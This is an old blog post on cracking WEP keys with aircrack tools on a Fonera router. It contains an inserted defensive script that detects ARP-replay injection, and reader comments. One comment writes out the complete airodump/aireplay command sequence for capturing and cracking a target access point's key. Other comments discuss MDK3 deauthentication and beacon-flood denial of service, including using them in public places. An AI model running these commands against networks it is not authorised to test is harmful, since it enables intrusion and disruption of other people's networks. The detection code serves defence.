Aircrack on Fonera With Legend Firmware

by Eric on January 22, 2008 · 13 comments

in Wireless

The DD-WRT firmware for the Fonera does not support packet injection, because it does not ship the patched MadWifi driver that injection requires. I’ve tried to make injection work with the DD-WRT firmware, but to no avail: as soon as injection begins, the router immediately freezes up. I am not going to go into the process of flashing open source firmware; you can find guides for that at FoneraHacks.com.

A quick rundown of what was done:

    * Mount a network share for the capture files (the Fonera does not have enough memory to store capture files locally)
    * Create a wireless interface "ath1" in monitor mode
    * Start airodump to get a quick snapshot
    * Restart airodump with the "--bssid" option to cut down on file size and "-w" to specify the write location
    * Start aireplay in fake authentication mode
    * Once the authentication has completed, start aireplay in replay mode
    * Collect 35,000 – 60,000 packets (for 128-bit WEP)
    * Use aircrack-ptw to recover the key
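The rundown above describes what the attack looks like on the air: one station re-sends the same captured WEP frame hundreds of times per second, and the access point answers each one with a freshly encrypted frame, which is where the tens of thousands of unique IVs come from. The script below is an added example, not code from the original post or from any of the tools it names, showing how that pattern can be spotted in a capture from the defending side. It models frames as plain dicts with constructed values so it runs offline; in a real deployment the same fields (timestamp, transmitter address, BSSID, To-DS flag, WEP IV, frame length) would come from a monitor-mode pcap parser, which is assumed rather than implemented here.

```python
"""Detect WEP ARP-replay injection in a capture (added example, constructed data)."""
import math
from collections import Counter, defaultdict

# Constructed addresses; any resemblance to real hardware is accidental.
AP = "00:11:22:33:44:55"        # BSSID of the monitored WEP network
CLIENT = "66:77:88:99:aa:bb"    # a legitimate station
INJECTOR = "cc:dd:ee:ff:00:11"  # a station replaying a single captured frame


def make_frame(ts, src, bssid, to_ds, iv, length):
    """One WEP data frame as the fields a monitor-mode capture exposes."""
    return {"ts": ts, "src": src, "bssid": bssid, "to_ds": to_ds,
            "iv": iv, "length": length}


def build_sample_capture():
    """Constructed capture: 10 s of normal traffic, then a 1 s replay burst."""
    frames = []
    iv = 0x100000
    # Background: the client sends ~5 frames/s, each with a fresh IV, and the
    # AP answers each one, also with a fresh IV.
    for i in range(50):
        ts = i * 0.2
        frames.append(make_frame(ts, CLIENT, AP, True, iv, 90 + (i % 7) * 10))
        frames.append(make_frame(ts + 0.05, AP, AP, False, iv + 0x800000,
                                 120 + (i % 5) * 20))
        iv += 1
    # Replay burst at t=10 s: the same 68-byte frame (same IV 0xABCDEF) is
    # sent to the AP 300 times within one second; the AP re-encrypts each
    # reply with a new IV, so 300 new IVs appear in that same second.
    ap_iv = 0x900000
    for i in range(300):
        ts = 10.0 + i / 300.0
        frames.append(make_frame(ts, INJECTOR, AP, True, 0xABCDEF, 68))
        frames.append(make_frame(ts + 0.001, AP, AP, False, ap_iv + i, 86))
    return frames


def detect_replay(frames, window=1.0, repeat_threshold=50):
    """Flag a (source, IV, length) triple repeated >= threshold times in a window.

    A station re-sending one WEP frame with the same IV dozens or hundreds of
    times per second is the signature of ARP replay; a normal client never
    reuses an IV at that rate.
    """
    buckets = defaultdict(Counter)
    for f in frames:
        if not f["to_ds"]:          # only frames sent towards the AP
            continue
        win = math.floor(f["ts"] / window)
        buckets[(f["bssid"], win)][(f["src"], f["iv"], f["length"])] += 1
    alerts = []
    for (bssid, win), counter in sorted(buckets.items()):
        for (src, iv, length), n in counter.items():
            if n >= repeat_threshold:
                alerts.append({"window_start": win * window, "bssid": bssid,
                               "src": src, "iv": iv, "length": length,
                               "repeats": n})
    return alerts


def unique_iv_rate(frames, bssid, window=1.0):
    """Unique IVs per second emitted by the AP, per window.

    This is the quantity a WEP key-recovery attack harvests; a jump from a
    handful per second to hundreds is the other half of the injection signature.
    """
    per_window = defaultdict(set)
    for f in frames:
        if f["src"] == bssid and not f["to_ds"]:
            per_window[math.floor(f["ts"] / window)].add(f["iv"])
    return {win * window: len(ivs) / window
            for win, ivs in sorted(per_window.items())}


if __name__ == "__main__":
    capture = build_sample_capture()
    for alert in detect_replay(capture):
        print("replay burst at t=%.0fs: %s resent IV %06x (%d bytes) %d times"
              % (alert["window_start"], alert["src"], alert["iv"],
                 alert["length"], alert["repeats"]))
    for start, rate in unique_iv_rate(capture, AP).items():
        if rate > 50:
            print("AP emitted %.0f unique IVs/s at t=%.0fs" % (rate, start))
```

Both detectors are deliberately simple: the replay check keys on exact IV reuse from one transmitter, which a legitimate WEP client does not do at high rate, and the IV-rate check needs only the AP's own frames. Either alone is noisy on a busy network; together they match the rundown's step of collecting tens of thousands of packets in minutes, and the practical mitigation they point at is the same in every case, which is to retire WEP rather than tune thresholds.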

{ 3 trackbacks }

10 invites to join Fon...and get a really cheap linux wireless router | MobileMoko - Guides and News for the OpenMoko
02.06.08 at 8:12 am
Fonerahacks.com is Online at Is You Geeked Up? | Blog for the Geeks | isyougeekedup.com
02.15.08 at 12:18 am
Securing Wireless Networks Internally at Is You Geeked Up? | Blog for the Geeks | isyougeekedup.com
03.14.08 at 5:36 pm

{ 10 comments… read them below or add one }

1 Alex Hortin 01.26.08 at 1:26 am

that was awesome… can't wait to get my hands on my new fonera+ with directional antenna

2 bob smtih 01.30.08 at 8:03 pm

is it possible for you to do another article on flashing the router? I'm having trouble flashing mine.

3 prochobo 01.30.08 at 9:11 pm

What problems are you having? To tell you the truth, it isn’t that high on my priority list, but I may in the future. The reason for that is, many people have already created very comprehensive tutorials on the process. Here are the two websites I found to be the best and most thorough:

To flash to DD-WRT
http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing

To flash to Legend
http://www.dd-wrt.com/phpBB2/viewtopic.php?t=16412&postdays=0&postorder=asc&start=0

4 meltyblood 02.03.08 at 10:19 am

That’s interesting. I’m suddenly famous. Now I feel obligated to update my firmware.

Trouble flashing? email me: kmeltyblood@gmail.com

5 prochobo 02.03.08 at 5:10 pm

Well, it would be great if you could update Legend. I know there’s at least a few loyals running your firmware. I love the web interface, but it’d be awesome if it was finished :)

6 Alex Hortin 02.05.08 at 2:45 am

I can’t wait to get my new foneras…if you could post a video of an MDK3 attack that would make waiting a little easier haha

7 prochobo 02.05.08 at 5:07 pm

I was going to, but I ran into some issues. The DoS and fake AP generator worked fine; however, the client deauthentication attack didn’t go too well. In my environment with 2 wireless clients, MDK3 couldn’t disconnect either of them. I haven’t found many MDK3 users to help me out with that either :(

I also tried setting MDK3 to perform the “b a d” (DoS, AP gen., and deauth) on startup of the Fonera, but the beacon flood attack just “quit” about 2 minutes after startup and the deauth didn’t really work against my network.

8 Alex Hortin 02.05.08 at 9:36 pm

yeah, so denial of service works? Does it just flood the router so it won't pass any traffic? The AP generator is cool, it's part of this video I found

http://youtube.com/watch?v=Bq7mWBtNhjs

he uses aireplay for the deauth attack

I assume you are trying to use the startup with your battery pack mod for mobile fun at Starbucks or something similar. I should be getting mine soon and am excited to experiment with all these utilities. It's good news that melty seems to want to keep his firmware updated since it seems to be the best for this kind of activity haha

9 Greg 02.27.08 at 9:21 pm

Hello,

I have successfully flashed my fonera to Meltyblood’s Legend Pre-4.5 and have tried following your video tutorial here without success on two separate (and different branded) WEP enabled routers.

The only thing I did to the fonera after flashing to Pre-4.5 is change the default password, nothing else. Here is a rundown of the commands I enter; I’ve replaced actual values with placeholders (the square brackets and text) to confirm with you guys it’s at least the right *type* of data I should be putting there…

1) wlanconfig ath1 create wlandev wifi0 wlanmode monitor

2) mount.cifs [network share path] /mnt/shared -o username=[username]

3) airodump-ng ath1 (just to check the target AP is ‘visible’ to the fonera)

4) airodump-ng -c 1 --bssid [target AP mac] -w /mnt/shared/capture ath1

5) aireplay-ng -1 0 -e [target AP essid] -a [target AP mac] -h [fonera mac] ath1

6) aireplay-ng -3 -b [target AP mac] -h [fonera mac] ath1

The association was successful at step 5 but it’s at step 6 where I am having problems. The read and sent packets both go up at the same rate but the data value in the airodump-ng cap terminal window stays at the same slow rate it did before I pressed enter on step 6. It does not shoot up to the kind of speeds I’m seeing in your video. I decided to leave it for an hour, come back to find read and sent were both in the two hundred thousand range whereas data had only reached 300, yes just three hundred, no thousands or millions.

If it helps, PWR and RXQ for the AP in question is at (a seemingly healthy) 25 and 100 respectively.

Was I supposed to configure some other settings in Legend after flashing it before I tried this WEP cracking?

Is it because there is supposed to be another user associated to the target AP doing their usual surfing that would help in this cracking process? It’s only me on there trying to hack my own router when I try ^_^

I’m even running BT3 in a VM just like in the video!

Thanks in advance for any help given.

-Greg

10 prochobo 02.27.08 at 9:45 pm

Greg,

Since you actually are sending packets in step 6, you should be receiving ARP requests as well. Correct me if I’m wrong. Your procedure is correct also. Some routers are not susceptible to this kind of attack, so you may want to try the attack against another router if you could.

Having another user browsing the web would only speed up the process of receiving ARP requests, which then speeds up the injection process. It is not necessary to have that though and you’ve proved it because you were getting ARP requests (I’m assuming).

You don’t have to configure any additional settings to do the attack either. If the method in the video doesn’t work for you, try the steps in this thread:

http://fonerahacks.com/forums/viewtopic.php?t=24

Scroll about half way down, the post was posted by “orange”. You’ll see an alternate way of injecting packets.
